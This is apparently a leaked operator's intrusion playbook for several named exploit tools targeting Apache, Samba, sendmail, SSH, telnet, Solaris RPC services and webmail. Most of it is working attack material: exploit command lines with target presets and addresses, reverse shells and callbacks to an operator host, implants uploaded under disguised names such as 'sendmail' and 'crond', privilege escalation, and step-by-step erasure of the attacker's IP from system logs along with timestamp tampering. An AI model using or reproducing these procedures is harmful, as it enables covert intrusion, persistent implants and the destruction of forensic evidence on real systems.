-c "sh &0 2>&0")" ### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window): ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh" ############ No Redirection: ./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/ bin/telnet LOCALIP NETCAT_PORT" ./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -display LOCALIP:0 -e /bin/sh)" ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh&0 2>&0)" ### if the exploit stalls after a bit, hit Ctl-C to wake it up, which ### prompts you if you want to continue - hit 'y' ### watch for a connection back to your netcat window ### Once you have access........ ### you need to first clean extraneous processes started by httpd ### run this to help clean: unset HISTFILE unset HISTSIZE unset HISTFILESIZE pwd exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&- /usr/sbin/lsof |grep ^sh uname -a; id mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp cd /tmp/.httpd-lock; pwd which uudecode uncompress #telnet PITCH_IP NETCAT_PORT /tmp/.httpd-lock/crond chmod 700 crond PATH=. crond PATH=. D=-cPITCHIP:NOPEN_PORT crond rm crond -nstun TARGET_IP -nrtun NOPEN_PORT noclient TARGET_IP ### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9) ### Logging: -lt /var/log/httpd /var/log/httpd/ssl_access_log /var/log/httpd/ssl_request_log /var/log/httpd/ssl_error_log /var/log/httpd/error_log -lt /var/log /var/log/messages /var/log/secure /var/log/maillog egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_access_log egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl_request_log egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_error_log egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog #################################### ### ENVELOPSWALLOW #################################### # buffer overflow for Apache Web Usage: ./envelopswallow <-switches> -h host[:80] -h host[:port] Host to penetratea and TCP port of the web server to attack -t # Target id. Bruteforcing options (all required, unless -o is used!): -o char Default values for the following OSes (f)reebsd, (o)penbsd, (n)etbsd -b 0x12345678 Base address used for bruteforce Try 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd. -d -nnn memcpy() delta between s1 and addr to overwrite Try -146/obsd, -150/fbsd, -90/nbsd. -z # Numbers of time to repeat \0 in the buffer Try 36 for openbsd/freebsd and 42 for netbsd -r # Number of times to repeat retadd in the buffer Try 6 for openbsd/freebsd and 5 for netbsd Optional stuff: -w # Maximum number of seconds to wait for shellcode reply -c cmdz Commands to execute when our shellcode replies aka auto0wncmdz -W # of seconds to wait between tries (use this when tunneling thru nopen) -scan http TARGET_IP -tunnel l RANDOM TARGET_IP 80 r NETCAT_PORT ./envelopswallow # plug in the options of the matching line # change TARGET_IP to 127.0.0.1 if using redirection # 4.0 FreeBSD RELEASE apache-1.3.12(distro binary) apache+mod_ssl-1.3.12+2.6.2(distro binary) # apache+php-1.3.12+3.0.15 (distro binary) apache+php-1.3.12+4.0b3 (distro binary) # apache+ssl-1.3.9+1.37(distro binary) ./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_IP:80 # 4.1 FreeBSD Apache 1.3.12(distro binary) ./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_IP:80 ./envelopswallow -o f -w 1000 -b 0xbfbf0000 -d -134 -r 11 -z 16 -h TARGET_:80 # 4.1 FreeBSD Apache 1.3.14 / 1.3.17 / 1.3.19 / 1.3.20 / 1.3.22 / 1.3.23 / 1.3.24 (built from source) ./envelopswallow -o f -h TARGET_IP:80 -w 1000 -b 0x080edc29 -d -146 -z 36 -r 6 # 4.4 FreeBSD Apache 1.3.20(binary) ./envelopswallow -b 0xbfbf0000 -z 16 -r 11 -d -134 -h TARGET_IP:80 # 4.4 FreeBSD ru-apache+mod_ssl-1.3.20+30.5+2.8.4 (distro binary) ./envelopswallow -b 0xbfbfd000 -z 16 -r 11 -d -134 -h TARGET_IP:80 # 4.5 FreeBSD apache+mod_ssl-1.3.22+2.8.5_4(distro binary) and apache-1.3.22_7 (distro binary) ./envelopswallow -b 0xbfbfd000 -z 16 -r 11 -d -134 -h TARGET_IP:80 ### Let it run for about addresses (rows of PppP...ppP's) then bail if it doesn't hit ### maybe let it run an hour or less unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la uncompress sendmail.Z netstat -an | grep RAT_PORT D="-l RAT_PORT" PATH=. sendmail ### pitch window -nstun TARGET_IP RAT_PORT upload local: rforkx.freebsd (FreeBSD 4.1 & 4.3) or sm11x.freeBSD ( ONLY for: 7.0, 7.1, FBSD 4.2 FBSD -t0 7.0 -t1 7.1 -t2 ###################################### # RFORKX ###################################### ### elevation for x86/FreeBSD # Works-on : # FreeBSD 3.1-RELEASE (GENERIC) #0: Mon Feb 15 11:08:08 GMT 1999 # FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999 # FreeBSD 3.3-RELEASE (GENERIC) #0: Thu Sep 16 23:40:35 GMT 1999 # FreeBSD 4.0-RELEASE (GENERIC) #0: Mon Mar 20 22:50:22 GMT 2000 # FreeBSD 4.1-RELEASE (GENERIC) #0: Fri Jul 28 14:30:31 GMT 2000 # FreeBSD 4.2-RELEASE (GENERIC) #0: Mon Nov 20 13:02:55 GMT 2000 ### fails on some newer versions of FreeBSD ### upload executable cp rforkx rf packrat NETCAT_PORT rf telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la uncompress rf ls -latr chmod 700 rf ./rf # wait 5 sec and maybe control-c id # start nopen as root then reconnect ###################################### # SM11X ###################################### Target platform 1: Red Hat Linux release 7.0 (Guinness) ESMTP Sendmail 8.11.0/8.11.0 Target platform 2: Red Hat Linux release 7.1 (Seawolf) ESMTP Sendmail 8.11.2/8.11.2 Target platform 3: FreeBSD 4.2-RELEASE ESMTP Sendmail 8.11.1/8.11.1 Caldera Linux 3.1 Conectiva Linux 6.0 Conectiva Linux 7.0 Immunix Linux 7.0 SuSE Linux 7.0 SuSE Linux 7.1 SuSE Linux 7.2 "sendmail" daemon with any of the versions... 8.11 8.11.1 8.11.2 8.11.3 8.11.4 8.11.5 8.12.beta5 8.12.beta7 8.12.beta10 8.12.beta12 8.12.beta16 What assumptions have been made in the design of this capability? Setuid "root" existence of "/usr/sbin/sendmail" on Red Hat Linux 7.0 and 7.1 systems, and "/usr/libexec/sendmail/sendmail" on FreeBSD-4.2 systems. ### LOGGING: "/var/mail/maillog", cat /etc/redhat-release ls -l /usr/sbin/sendmail ./sm11x -t OPTION ### look for the cksums to match, if they don't, you have 5 secs to control-c ### if you don't control-c, a second 5-sec counter will start; you'll also see the following message: Recipient names must be specified ###### Cleanup: /var/log/messages (brute force) /var/log/error_log (bus error, segment. fault, server seems busy) ################################### # EGGBARON ################################### ### Linux and FreeBSD systems running Samba 2.2.x (pre 2.2.8a) on x86 architectures. ### If successful, it has samba start a listener on port 45295 and the exploit will attempt ### to connect to it to give you root. ### If you're redirecting, you need to set up a tunnel to port 45295 on the target, ### then connect to it via netcat. ### Note, that if you use the same ports on both tunnel ends, eggbaron may think that it ### was already successful because of false positives by the tunnel ### Might need to let it give "failed" messages 20-30 times before it works. ./sambal samba-2.2.x < remote root -------------------------- Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (default = 300) -c connectback ip address -C max childs for scan/bruteforce mode (default = 40) -d bruteforce/scanmode delay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode ./sambal -t0 samba-2.2.x < remote root -------------------------- 01. samba-2.2.x - Debian 3.0 [0xbffffea2] 02. samba-2.2.x - Gentoo 1.4.x [0xbfffe890] 03. samba-2.2.x - Mandrake 8.x [0xbffff6a0] 04. samba-2.2.x - Mandrake 9.0 [0xbfffe638] 05. samba-2.2.x - Redhat 9.0 [0xbffff7cc] 06. samba-2.2.x - Redhat 8.0 [0xbffff2f0] 07. samba-2.2.x - Redhat 7.x [0xbffff310] 08. samba-2.2.x - Redhat 6.x [0xbffff2f0] 09. samba-2.2.x - Slackware 9.0 [0xbffff574] 10. samba-2.2.x - Slackware 8.x [0xbffff574] 11. samba-2.2.x - SuSE 7.x [0xbffffbe6] 12. samba-2.2.x - SuSE 8.x [0xbffff8f8] 13. samba-2.2.x - FreeBSD 5.0 [0xbfbff374] 14. samba-2.2.x - FreeBSD 4.x [0xbfbff374] 15. samba-2.2.x - NetBSD 1.6 [0xbfbfd5d0] 16. samba-2.2.x - NetBSD 1.5 [0xbfbfd520] 17. samba-2.2.x - OpenBSD 3.2 [0x00159198] 18. samba-2.2.8 - OpenBSD 3.2 (package) [0x001dd258] 19. samba-2.2.7 - OpenBSD 3.2 (package) [0x001d9230] 20. samba-2.2.5 - OpenBSD 3.2 (package) [0x001d6170] 21. Crash (All platforms) [0xbade5dee] # EGGBARON may not work the first time using the target number as the -t flag. # Try bruteforcing it using the -b flag. This usually works, and after very few tries. # If this is taking a long time, try setting the bruteforce step size down using -b 100. # Subsequently, the -t flag will work ./sambal -b 0 TARGET_IP ####### redirected: ### via pitch: -tunnel l 1139 TARGET_IP 139 l 4444 TARGET_IP 45295 r NETCAT_PORT ### Locally: ./sambal -p 1139 -b 0 127.0.0.1 ./sambal -f -p 1139 -b 0 127.0.0.1 # skip to nc section ### Thru a windows box: ### 1. Need a 2 second delay (-d 2000000) ### 2. Need three tunnels (exploit, nc to port 45295, and callback to upload RAT) background redirect -tcp -lplisten 4444 -target 10.1.1.3 45295 -bind WINDOWS_LOCAL background redirect -tcp -lplisten 1139 -target 10.1.1.3 139 -bind WINDOWS_LOCAL background redirect -tcp -implantlisten 25896 -target LOCAL_UNIX 25896 -nodes 40 ### If you think you can't contact the target directly and want the exploit to ### call back to you, use the "-c WINDOWS_TARG_CALLBACK" option, and start ### a windows tunnel and unix netcat listener on port 45295 ### Even if the "-c WINDOWS_TARG_CALLBACK" is used, both a callback to port 45295 _AND_ ### a listener on the target's port 45295 will be created ### Locally: ./sambal -t0 ./sambal -r 0xbffffb00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 2000000 -p 1139 WIN_LOCAL ./sambal -r 0xbffffd00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 2000000 -p 1139 WIN_LOCAL ### try connecting via netcat after any "session failed" message when redirecting: nc PITCH_IP_or_WINDOWS_LOCAL 4444 unset HISTSIZE unset HISTFILESIZE unset HISTFILE w uname -a ### start a netcat with the right nopen version (don't need to uuencode with /dev/tcp way) ### nc -l -v -p NETCAT_PORT < sendmail pwd mkdir /tmp/.scsi; cd /tmp/.scsi; pwd ls -l /usr/bin/uudecode /bin/cat/tmp/.scsi/sendmail chmod 700 sendmail PATH=. sendmail id ### Cleanup # look for stray process in netstat (bunch of funky chars followed by /bin/sh on port 45295) # then kill the associated process running it: netstat -anlp | grep 45295 ps -ef |grep kill -9 # Logging depends on OS; usually indicated in smb.conf file or check: # /var/log/samba/smb.log, /var/log/samba/.log ### ################################################## # EXTRANEOUSMONKEY ################################################## -tunnel l 443 TARGET_IP ### verify the exploit will work with a test command: ./em -i 127.0.0.1 -t 2 -u "w; date; date -u; uname -a" ### next, run this one using the proper noclient & noserver ### nopen will be started as httpd owned by apache ### you'll connect in the / directory ./em -i 127.0.0.1 -t 2 -s /current/up/noserver -c /current/bin/noclient -cd /tmp -lt uname -a ### start another nopen listener on a random port (not reusing the socket) unset I; PATH=. D=-l38475 .httpd ### from redirector -nstun TARGET_IP:38475 ### elevate using your favorite local (probably EVENTSTART), then start ### another privileged noserver, connect to it, then clean up ### Logging: /var/log/httpd/ssl_error_log /var/log/httpd/access_log /var/log/httpd/ssl_access_log /var/log/httpd/ssl_request_log ############################################################################## ### EXPIRETRACHEA ############################################################################# # close to freebsd 4.3 # copy nopen for freebsd 4.3 as noserver in /current/up; automatically uploads and connects -scan mail TARGET_IP # returns BorderWare MXtreme Mail Firewall #cgi-bin/remote/expiretrachea/i586-pc-linux-gnu/opscript.borderware #expiretrachea_helper.pl #expiretrachea.pl -h hostname -c PITCH_IP ### redirected: -tunnel l 80 TARGET_IP r 25 # 1st window expiretrachea_helper.pl -c PITCH_IP # 2nd window expiretrachea.pl -h 127.0.0.1 -c PITCH_IP # clean logs: ### /server/ftp/log/httpd: referer_log, ssl_request_log, and access_log #grep -v "-" /server/ftp/log/httpd/referer_log > /tmp/.scsi/c; cat /tmp/.scsi/c > /server/ftp/log/httpd/referer_log pwd -lt /server/ftp/log -lt /server/ftp/log/httpd -lt / df -k w ps -auxww -cd /var/tmp -get /server/ftp/log/messages -tail /server/ftp/log/messages grep -v DSADMIN /server/ftp/log/messages > m; cat m > /server/ftp/log/messages grep -v PITCH_IP /server/ftp/log/messages > m; cat m > /server/ftp/log/messages -get /server/ftp/log/httpd/referer_log -tail /server/ftp/log/httpd/referer_log grep -v prepend /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log grep -v x90 /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log grep -v admin /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log grep -v C /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log -get /server/ftp/log/httpd/access_log -tail /server/ftp/log/httpd/access_log grep -v PITCH_IP /server/ftp/log/httpd/access_log > m; cat m > /server/ftp/log/httpd/access_log -get /server/ftp/log/httpd/ssl_request_log -tail /server/ftp/log/httpd/ssl_request_log grep -v PITCH_IP /server/ftp/log/httpd/ssl_request_log > m; cat m > /server/ftp/log/httpd/ssl_request_log -get /server/ftp/log/httpd/error_log -tail /server/ftp/log/httpd/error_log grep -v PITCH_IP /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/httpd/error_log grep -v db_sql /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/httpd/error_log -rm m -rm /tmp/.scsi/sendmail /tmp/.scsi/getopt /tmp/.scsi -lt ################################################### ### NFTP ################################################### # nopen ftp ############ ourtn -lue PITCH_IP noclient PITCH_IP:PORT -tunnel 12121 udp # NOTE: As of v1.1, if this is not there, the error message will offer it as a pastable. # In the LOCAL window, use nftp to transfer a file in both directions # via NOPEN redirection to PITCH_IP in regular mode (-d and -V are # optional and give more debugging/verbose information): nftp -r PITCH_IP -d -V TARGET_IP # pnftp -r PITCH_IP -d -V TARGET_IP user password ls cd /bin lcd ../down #get vi cd /tmp #put vi vi.test1 bye ####################################### ### ELITEHAMMER ####################################### ### Runs against RedFlag Webmail 4 (software install) ### Gives you user nobody, not root; ### Need a local to get root (EVENTSTART or ELASTICBANJO?) ### Webmail port is usually 80 or 443 -scan http TARGET_IP -scan ssl TARGET_IP -scan 8025 TARGET_IP ### This version will reuse the same port for the nopen upload and the nopen callback: ### Redirector: -tunnel l WEBPORT TARGET_IP r CALL_BACK_PORT ### In two scripted local windows, run the following: ### 1st window ###./elitehammer_helper.pl -c -p [-n path to noserver ] [-s sleep secs ] ./elitehammer_helper.pl -c PITCH_IP -p CALL_BACK_PORT ### 2nd window ###./elitehammer.pl -h -m -c -p [-l if https] ./elitehammer.pl -h 127.0.0.1 -m WEBPORT -c PITCH_IP -p CALL_BACK_PORT ### Troubleshooting Elitehammer ### If you throw the exploit and just see the first connection, ### a firewall might be blocking certain outbound ports -tunnel l 8888 TARGET_IP mailport r 53 r 25 r 110 r 80 r 443 r 21 r 22 r 23 ### Locally, setup nc for each of the above ports to see what target will allow ### out (53,25,110,80,443,21,22,23) nc -l -p NETCAT_PORT ### Then surf the following in a web browser and watch your netcat window for a connection: http://127.0.0.1:8888/mod_password.php?cfg_m_function=http://PITCH_IP:NETCAT_PORT ### Once you've identified a port allowed out, change the CALL_BACK_PORT in your tunnels and ### commands aand try again ### Once successful, you'll be connected in a nopen window as user nobody -lt id -cd /tmp/.scsi -lt uname -a w ### more windows # noclient -l CALL_BACK_PORT # PATH=. D="-cPITCH_IP:CALL_BACK_PORT" sendmail ### Choose your poison for elevation (EVENTSTART, ELASTICBANJO, others) ### Clean up /webmail4/www/logs/access_log -lt /webmail4/www/logs -grep PITCH_IP /webmail4/www/logs/access_log grep -v PITCH_IP /webmail4/www/logs/access_log > m; cat m > /webmail4/www/logs/access_log touch -t YYMMDDHHMM.ss /webmail4/www/logs/access_log -lt /webmail4/www/logs/access_log -rm m -cd /tmp -rm .scsi ####################################### ### ELASTICBANJO ####################################### ### Elevates to root; make suren redmin is there -lt /usr/share/redmin/cgi/redmin ### must use /tmp/.scsi directory -cd /tmp/.scsi -put /current/up/gr.tbz2 gr.tbz2 tar xvfj gr.tbz2 -shell id ./gr unset HISTFILE unset HISTSIZE unset HISTFILESIZE id pwd cd /tmp/.scsi #PATH=. sendmail #noclient -l NOPEN_PORT #PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail exit exit ### Clean up /var/log/rflogview/system_info /var/log/cron /var/spool/at/.SEQ /tmp/1 -lt /tmp -rm /tmp/1 -lt /var/spool -lt /var/spool/at -cat /var/spool/at/.SEQ # decrement the number in the file by 1 #echo 00000 > /var/spool/at/.SEQ #echo NUMBER > /var/spool/at/.SEQ chown daemon:daemon /var/spool/at/.SEQ -cat /var/spool/at/.SEQ -lt /var/spool/at -touch /var/spool /var/spool/at/.SEQ -touch /var/spool /var/spool/at/spool -touch /var/spool /var/spool/at -lt /var/log/cron -grep LIST /var/log/cron # all should be from us -gs grepout LIST /var/log/cron #grep -v LIST /var/log/cron > m; cat m > /var/log/cron -lt /var/log/rflogview -tail /var/log/rflogview/system_info -grep LIST /var/log/rflogview/system_info -gs grepout LIST /var/log/rflogview/system_info # grep -v LIST /var/log/rflogview/system_info > m; cat m > /var/log/rflogview/system_info -lt / /var/run /var/log # check history files for root and user you elevated from -rm m sendmail -cd /tmp -rm /tmp/.scsi ########## Adding/Deleting ipchains rules to scan/exploit internal targets ### # specifically used for jogswirl *.133u, .132u) # on target -ifconfig ipchains -L -n --line-numbers > L:/current/down/ipchains.lnumbers-orig ipchains -L -n --line-numbers # locally ./fw-ipchains -h ./fw-ipchains -s 172.16.80.19 -d 172.16.0.0/16 # on target # copy/paste add rules (tcp/udp...) from fw-ipchains output # scan/exploit targets ipchains -L -n --line-numbers # copy/paste delete rules (tcp/udp...) from fw-ipchains output ipchains -L -n --line-numbers > L:/current/down/ipchains.lnumbers-clean ipchains -L -n --line-numbers # locally cd /current/down diff ipchains.lnumbers-orig ipchains.lnumbers-clean # make sure -orig and -clean look the same; resetting rules to original state:q ###################################################3 # KWIKEMART ###################################################3 # SSH-1.5-1.2.27 # SSH-1.5-OpenSSH-1.2.3 # SSH-1.99-OpenSSH_2.1.1 # SSH-1.99-OpenSSH_2.2.0 telnet TARGET_IP ./km* -t ./km -t0 ./km.e -t0 ./km -t2 TARGET_IP 22 # CLEAN UP /var/log/messages /var/log/auth ##################################################3 ############################################################ # SSH ############################################################ ### get nopen ready to paste with gedit: cp noserver sendmail compress sendmail uuencode sendmail.Z sendmail.Z > sendmail.Z.uu gedit sendmail.Z.uu ### redirector -tunnel l 22 TARGET_IP # Multiple targets? If so, wipe your known_hosts file locally between each: cat /dev/null > ~/.ssh/known_hosts ssh -x iga@127.0.0.1 "/bin/sh" # or ssh -p RANDOM_PORT -x username@127.0.0.1 /bin/sh # or this eliminates the lack of tty problem ssh -p RANDOM_PORT -x username@127.0.0.1 unset HISTFILE unset HISTFILESIZE unset HISTSIZE w id uname -a ls -la /boot mkdir /tmp/.scsi;cd /tmp/.scsi;pwd which uudecode uncompress # gedit sendmail uudecode; ls -la # LINUX: # start nopen so you can upload forkpty to be able to su (ptrace didn't work) -put forkpty f ./f # or: su ############## upload nopen: ### ### using uudecode pastable ### # if no uuencode and no ftshell (if you used telnet) try: # locally run: uudecode.pastable /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0 sendmail # paste the perl code that it spits out (hitting return after the last character), then # paste sendmail that is brought up in gedit # you may need to hit Ctl-C after you see the upload complete # Note: the upload may not echo to the screen until after the Ctl-C ### ### using cat & /dev/tcp: ### # on redir: -tunnel r RANDOM # netcat nc -l -v -p RANDOM < sendmail # on target: cat /dev/tcp/PITCH_IP/RANDOM > sendmail ### ### using wget: ### # If none of the above work: # Locally: echo -e 'HTTP/1.0 200\n' > new cat new ../up/morerats/noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > /current/up/sendmail nc -l -v -p RANDOM < sendmail # on redir: -tunnel r RANDOM # on target wget http://210.56.8.10:RANDOM/sendmail ls -la chmod 700 sendmail PATH=./sendmail -nstun TARGET_IP ### ### using secure copy ### # if that doesn't work, try secure copy: # on redir: -tunnel l RANDOM TARGET_IP 22 # in a local scripted window: cd /current/up cp /current/up/noserver crond scp -P RANDOM crond username@127.0.0.1:/tmp/.scsi/crond # enter passwd at the prompt ### ### Want netcat? netcat nc -- how abuot perl instead? ### using target's perl to open a socket, either ### callback or listen on target. ### my :%s/PERLNAME/PERLNAME/g :%s/PERLRANDOMPORT/PERLRANDOMPORT/g :%s/PERLCALLBACKIP/PERLCALLBACKIP/g :%s/PERLCALLFORWARDIP/PERLCALLFORWARDIP/g :%s,PERLUPLOADFILE,PERLUPLOADFILE,g `y #### CALLING out from target # LOCALLY use netcat to upload file nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE # or if you want a loop to keep listening after each upload while [ 1 ] ; do \ echo starting listen on PERLRANDOMPORT ; \ date ; \ nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE; \ echo done ; \ sleep 3 ; \ done # tunnel -tunnel r PERLRANDOMPORT # ON TARGET perl -MIO -e 'close(STDIN);$c=IO::Socket::INET->new("PERLCALLBACKIP:PERLRANDOMPORT")or exit1;binmode($c);open(O,">PERLNAME")or exit 1;binmode(O);select O;$|=1; print O while (<$c>);close(STDOUT);close($c);unlink("PERLNAME") unless (-s "PERLNAME");' ### LISTENING on target # ON TARGET perl -MIO -e '$s=new IO::Socket::INET(LocalPort,PERLRANDOMPORT,Reuse,1,Listen,10) or exit 1; $c=$s->accept() or exit 1;open(O,">PERLNAME")or exit 1;select O;$|=1;print O while <$c>;close(O);close($c);unlink("PERLNAME") unless (-s "PERLNAME");' # tunnel -tunnel l PERLRANDOMPORT PERLCALLFORWARDIP # LOCALLY nc -vv 127.0.0.1 PERLRANDOMPORT < PERLUPLOADFILE ### ### to elevate using EVENTSTART(?) use whatever name you want ### -put /current/up/h h # in your ssh or telnet masquerade window: ./h unset HISTFILE unset HISTFILESIZE unset HISTSIZE id cd /tmp/.scsi;pwd chmod 700 sendmail chown root:root /tmp/.scsi PATH=. sendmail ### in another window -nstun TARGET_IP 32755 -rm sendmail ##### Don't forget to burn the unprivileged nopen # Cleanup /var/log/secure /var/log/messages /var/log/lastlog /var/log/wtmp /var/run/utmp ########################################################### # BOSSLAD ########################################################### ### when nsrexec is there but NOT with nsrstatd??? ### like a tcp version of BS ### always uses port 7937 ### ./bll.tnc.gr # Before running this script, you first need to run the following: # nc -l -p localPort < file2Xfer&Run.uu # (nc must be in your path; it's also run w/in this script) # where file2Xfer&Run.uu is a compressed, uuencoded file. # Usage: bll.tnc.gr # [options] -- [options to ] # -i (required) # -l (required) # -p def = 32177 # -f (required) # -D def= /tmp/.X11R6 # # ./bll.tnc.gr -i 66.128.32.67 -l 67.233.61.230 -p 24792 -f sendmail -D /tmp/.scsi packrat NETCAT_PORT ### On redirector: -tunnel l 7937 TARGET_IP r NETCAT_PORT ### On local machine: ### Ex.: ./bll.tnc.gr -i 127.0.0.1 -l 150.27.1.11 -p 45226 -f sendmail -D /tmp/.scsi ./bll.tnc.gr -i 127.0.0.1 -l PITCH_IP -p NETCAT_PORT -f RAT_NAME -D /tmp/WORK_DIR ### Once upload of RAT completes, connect to target from PI with nopen: -nstun TARGET_IP ### Cleanup -ls /nsr/cores -ls /nsr/cores/sh -cat /nsr/cores/sh/* rm /nsr/cores/sh/* -rm /nsr/cores/sh -touch SOMEFILE /nsr/cores -ls /nsr/logs -ls /nsr/logs/daemon.log -get /nsr/logs/daemon.log wc -l /nsr/logs/daemon.log head -## /nsr/logs/daemon.log > n -cat n cat n > /nsr/logs/daemon.log touch SOMEFILE /nsr/logs/daemon.log ######################################################### # ELVISCICADA ######################################################### ### only up to ealry Sol2.9; Sol2.10 not vulnerable ### snmpXdmid (/usr/lib/dmi/dmispd) daemon program (RPC program 300598 version 1) # Req: # 1. you must know the OS # 2. you must ba able to connect with TCP (for when you get the root shell) # 3. /usr/lib/dmi/dmispd must be running on the target system, # and you must be able to successfully talk to its ___UDP___ port. # This is usually evidenced by RPC program 300598 version 1 # during rpcinfo -p and UDP rpcinfo -n "touches" of the target, such as... # # $ rpcinfo -p target # ... # 300598 1 udp 32879 # 300598 1 tcp 32796 # ... # $ rpcinfo -n 32879 -u target 300598 # program 300598 version 1 ready and waiting # $ # # if rpcinfo -n returns "ready and waiting", ELVISCICADA should be ready to sing. ### -scan brpc TARGET_IP ### look for program 300598 version 1 of dmispd and make note of UDP port ### test that TCP connects get thru to the default shellcode port (32387) ### (being refused is still good - means it went thru) ### If the port doesn't answer, pick another port that works, AND add the "-s" option ### using the new (random) port # ON PI: -tunnel l 32387 TARGET_IP # Locally telnet 127.0.0.1 32387 ### Usage: ./dw.linux ### Use the lowest number for the target OS and increment by one for subsequent attempts: ./dw.linux -t -i TARGET_IP -s RANDOMSHELLPORT -p UDPPROGRAMPORT ./dw.linux -t -i TARGET_IP -p UDPPROGRAMPORT ### If redirected: # On PITCHIMPAIR -tunnel l RANDOMSHELLPORT TARGET_IP u PROGRAMPORT TARGET_IP r NETCATPORT # Locally: ./dw.linux -t -i 127.0.0.1 -s RANDOMSHELLPORT -p UDPPROGRAMPORT -w 10 -b 1024 ./dw.linux -t -i 127.0.0.1 -p UDPPROGRAMPORT ### Once you have root, get nopen up there: ### on PITCHIMPAIR -tunnel r NETCAT_PORT ### On target: unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la uncompress sendmail.Z netstat -an | grep RAT_PORT D="-l RAT_PORT" PATH=. sendmail netstat -an | grep RAT_PORT ### pitch window -nstun TARGET_IP RAT_PORT ### Restart both dmispd daemons before leaving the target: ps -ef |grep dmi exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- rpcinfo -d 300598 1 /etc/rc3.d/S77dmi stop < /dev/console 2>&1 >/dev/null /etc/rc3.d/S77dmi start < /dev/console 2>&1 >/dev/null ps -ef |grep dmi ### should see something like this: # root 580 399 0 12:48:18 ? 0:00 grep dmi # root 577 1 0 12:48:18 ? 0:00 /usr/lib/dmi/snmpXdmid -s target # root 573 1 0 12:48:18 ? 0:00 /usr/lib/dmi/dmispd ### Cleanup: # possible core file in /? or /usr/lib/dmi/dmispd? -ls /core /usr/lib/dmi/dmispd #/var/adm/messages (for failures) -tail /var/adm/messages ######################################################### # EMPTYCRISS ######################################################### ### No redirection: ### This will create the output to paste into the telnet window: ### local unscripted window: ./emptycriss TARGET_IP # or perl ./emptycriss TARGET_IP ### op window ### paste instructions from 1st window into this one ### Ex.: #ATTACKER# telnet # #ATTACKER# telnet> environ define TTYPROMPT abcdef # #ATTACKER# telnet> o victimip # #ATTACKER# telnet> root c c c c c c c c c c c c c c #c c c c c c c c c c c c c c c c c c c c c c c c c c #c c c c c c c c c c c c c c c c c c c c c c c c\n ## ##id ##uid=0(root) gid=1(other) ##uname -a ### if it fails, try again as /bin ftshell telnet ### Redirected: -tunnel l RANDOM TARGET_IP 23 # # In unscripted window # ./emptycriss 127.0.0.1 # In scripted op window: ftshell telnet ### NOTE: be sure to open 127.0.0.1 on the RANDOM redirected port #Ex: #o 127.0.0.1 RANDOM unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd ~~p noserver sendmail ls -la chmod 700 sendmail PATH=. D="-l RAT_PORT" sendmail ########################################## # EASYSTREET ########################################## ### cmsd 100068 ### UDP is best since it's a single packet to exploit -scan rpc TARGET_IP # look for 100068 and make note of port ### UDP is best since it's a single packet to exploit ### with -sploit: #-sploit will ask you which exploit to try. # Select 'CM' (calendar manager) # Another window will pop up to run the exploit # This window will pause to allow you to verify the command it will run. # The command should look something like this (the ports will vary): # -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120 -c # Append '-T 2' to the front of the line so that it looks like this: # -T 2 -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120 -c # Then press return. 